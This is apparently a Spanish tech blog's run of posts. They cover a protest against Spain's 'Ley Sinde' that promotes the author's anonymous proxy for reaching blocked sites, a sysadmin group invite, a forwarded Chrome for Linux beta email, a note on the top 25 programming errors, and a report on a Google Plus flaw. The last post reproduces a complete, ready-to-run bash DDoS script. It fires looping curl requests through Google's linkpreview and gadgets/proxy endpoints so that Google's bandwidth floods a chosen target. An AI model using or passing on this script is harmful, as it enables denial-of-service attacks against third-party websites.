El proyecto de la “Ley Sinde” ha sido aprobado :(

Damas y caballeros, el Gobierno de España nos la acaba de meter hasta el fondo con premeditación, alevosía y engaños incluidos al aprobar el pasado día 19 de marzo de 2010 el proyecto de la aberración llamada “Ley Sinde” vía Consejo de Ministros en la ciudad española de Sevilla.

Sí amigos, ni el manifiesto, ni las reuniones con la Ministra del Copyrigh, ni las movilizaciones en la calle, ni todas las demás iniciativas que se pusieron en funcionamiento contra la Disposición Final Primera incluida en el marco de la Ley de Economía Sostenible han servido para que el Gobierno de España frenara el avance, y más que segura aprobación en el Congreso, de dicha legislación (quien dice legislación dice barrabasada), la cual entre otras cosas permite que desde ahora en España se puedan cerrar webs sin requerir intervención judicial.

Pero la aprobación del anteproyecto la “Ley Sinde” demuestra (y supondrá en breve) muchas más cosas verdaderamente graves, acabamos de asistir a la confirmación de que a día de hoy el peso de la ciudadanía es prácticamente igual a cero, somos puros títeres que el poder político maneja a su antojo. Por otro lado la aprobación de la “Ley Sinde” supone también la confirmación de que los lobbys empresariales son los que “cortan el bacalao” en España. Y finalmente esta nueva legislación es un atropello mayúsculo a los derechos fundamentales de los ciudadanos. Estos son los puntos más críticos, pero hay muchas más consecuencias negativas, algunas de las cuales ni siquiera podemos ver a día de hoy, tendremos que esperar un tiempo para poder apreciar el verdadero impacto negativo que tendrá la Disposición Final Primera.

¿Y ahora qué? se estarán preguntando muchos. Pues la verdad que es complicado contestar a esa pregunta, pero varias cosa sí tengo muy claras: no es el momento de lloriquear ni tampoco de los reproches, es el momento de reflexionar de forma conjunta sobre cómo seguir dando batalla donde más les duela (ahora ya hay que hablar en términos de guerra que son los que mejor cuadran). Y lo tenemos que hacer sí o sí, lo que nos estamos jugando en estos últimos tiempos, no solamente en España, son cosas extremadamente importantes y lo que hagamos hoy o no hagamos, repercutirá de forma decisiva en el futuro.

WEB SOLUCIÓN A LA LEY SINDE

Pues bien amigos! he hecho una pagina en la que no hay restinción de ningún tipo, se trata de NavegasinLey.com

Navegasinley.com página es una web proxy gratuita y anónima que permite eludir reestricciones de seguridad que puedas tener en tu conexión de Internet y navegar por los sitios bloqueados o simplemente para navegar de un modo anónimo y seguro, sin necesidad de instalar ningún software en tu ordenador. Si navegas por Internet a través de esta web, los sitios web no registrarán tu IP real de tu conexión a Internet, además no necesita configurar o actualizar el firewall, ni ningún otro sistema de navegación, todo esta preparado y funcionando para que introduzcas la URL en el caja de insercción de la web  y empieces a navegar anónimamente, estés donde estés, oficina, cibercafé, colegio, bibliotecas, instituto, hospital, universidad…

Postdata: Zapatero en las próximas elecciones vas y le pides el voto a Alejandro Sanz, Bisbal, Chenoa, Bustamante… todos esos cantantes que estan FORRAOS de billetes, y viven en MIAMI (en una casa que mas quisieran los yonkis de Callejeros)  y a todos los los miembros de la SGAE que tocan los huevos y no paran de tocarlos…

Parte de la fuente del artículo : http://alt1040.com/2010/03/el-proyecto-de-la-ley-sinde-ha-sido-aprobado-bienvenidos-a-la-republica-bananera-espanola

Abierto el Grupo de Sysadmins en tuentishare.com

He abierto un Grupo en la web tuentishare.com llamado Sysadmins para que todo el que tenga dudas de algo sobre todo lo relacionado al mundo de administración de servidores, linux, seguridad, etc.. exponga ally sus dudas o inquietudes libremente o simplemente quiera aportar post, videos, imagenes, archivos… También teneis la posibilidad de crear vuestros propios Grupos privados o publicos 😀

Os espero sysadmins 😀

Os podeis registrar desde este link directamente http://tuentishare.com/signup/invited:98d393bca846f0c74353a3d8863de83b

Disponible la versión beta de Google Chrome para Linux

Aqui os dejo el email que me acaba de llegar de Google anunciando la salida de la version beta de Google Chrome para Linux

Hola a todos los usuarios de Linux:

Google Chrome ha lanzado una versión beta para Linux. Nos gustaría dar las gracias a todos los desarrolladores de Chromium y de WebKit que nos han ayudado a convertir Google Chrome en un navegador rápido y estable. A continuación incluimos algunos datos interesantes sobre el trabajo del equipo de Google Chrome:

60.000 líneas de código escritas para Linux
23 compilaciones de desarrolladores
2.713 bugs corregidos para Linux
12 colaboradores y editores de bugs externos para la base de código de Google Chrome para Linux y 48 colaboradores externos de código

Gracias por la espera. Esperamos que disfrutéis de Google Chrome.

El equipo de Google Chrome

http://www.google.com/chrome/intl/es/w00t.html

——–

(c) 2009 Google www.google.com 1600 Amphitheatre Parkway, Mountain
View CA 94043 Estados Unidos de América

Lista de los 25 errores de programación más peligrosos

Grupo internacional de expertos ha publicado una lista con los 25 errores de programación con mayor potencial de daño. La mayor parte de los agujeros de seguridad en programas informáticos se debe a errores de programación, que podrían ser evitados si los programadores fueran más cautelosos con su trabajo.

Ante tal situación, un grupo internacional de expertos ha elaborado una lista con los 25 peores errores de programación que ocasionan vulnerabilidades. El grupo incluye, entre otros, al ministerio de seguridad interior de EEUU y NSA, la organización japonesa IPA y empresas privadas como Microsoft y Symantec.

La mayoría de los 25 errores de la lista son relativamente desconocidos entre los propios programadores. No forman parte de los estudios de los desarrolladores, y un mínimo de los fabricantes de software no prueban sus productos en busca de errores antes de lanzarlos comercialmente.

Las consecuencias pueden ser nefastas. Por ejemplo, dos de tales errores fueron explotados en 2008 para instalar código maligno en 1,5 millones de sitios web, que luego propagaron malware entre sus visitantes.
Continuar leyendo «Lista de los 25 errores de programación más peligrosos»

Fallo de seguridad en los servidores de Google Plus

Google Plus

Google Plus

Un nuevo agujero de seguridad ha sido descubierto en los servidores de Google plus que permite a los hackers hacer un ataque DDoS usando el ancho de banda de Google.

Google plus ha sido objeto de pruebas desde ya hace un tiempo y una de las personas encargadas de estas pruebas (de una empresa de seguridad italiana) ha informado de que los servidores de Google plus se pueden utilizar para hacer solicitudes DDos a otros sitios web.

La noticia original de este informe se puede ver en IHTeam un blog de seguridad propiedad de Simone Quatrini. Él demuestra cómo los usuarios pueden hacer uso del servidor de Google para actuar como un proxy y buscar el contenido de cualquier sitio web que desee. También se observa que los servidores de Google son más anónimos que los demás servidores.

Ha mencionado dos métodos, uno que utiliza / _ / sharebox / linkpreview /. Este método no expone su dirección IP para conectarse a los servidores Apache. Pero el otro método, gadgets / proxy? Parece que si que se expone la dirección IP a los servidores.

El equipo también ha publicado un script para shell de linux que permite ejecutar la vulnerabilidad. El script hace una solicitud a los servidores de Google para hacer una petición a una página web. Lo importante del tema es que se utiliza el ancho de banda de Google en lugar del atancante.

Según comenta el autor, hayo otros métodos para atacar de manera más segura, pero lógicamente no los quiere exponer en la red.

Resumiendo, se puede hacer y descargar senzilla y rápidamente cualquier tipo de archivo a través de los servidores de Google haciendo un DDoS.

Mas abajo teneis el video explicativo y el script en bash que usa en el video Simone Quatrini 😀

Fuente | IHTeam

In this example i start a thread of 1000 requests and the output bandwidth will result in 91/96Mbps (my house bandwidth is only 6Mbps). This is my server, do not start to ddos around for no reason!

+DDoS source code download:

http://www.ihteam.net/advisories/_154785695367_+ddos.sh

#!/bin/bash

#   Bug found by                        #
#       Simone 'R00T_ATI' Quatrini      #
#       Mauro 'epicfail' Gasperini      #
#       Site: http://www.ihteam.net     #

function start {
    echo "[*] Sending `echo $2` Requests..."

    for a in `seq $2`
    do
        id=$((RANDOM%3999999+3000000))
        nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
        nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    done

    echo "[*] Still attacking `echo $urlclear`"
    echo "[*] Sleeping for 10 Seconds"
    sleep 10
    start url $2 urlclear
}

echo ''
echo '             88888888ba,    88888888ba,                  ad88888ba  '
echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
echo '    88      88        `8b  88        `8b               Y8,          '
echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
echo '    88      88         8P  88         8P  8b       d8          `8b  '
echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
    echo "Usage: $0 <big file> <Requests>"
    echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    echo ""

    exit 0
fi

case $2 in
    *[!0-9]* )  echo "$2 is not numeric" && exit 1;;
esac

echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1

url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""

start url $2 urlclear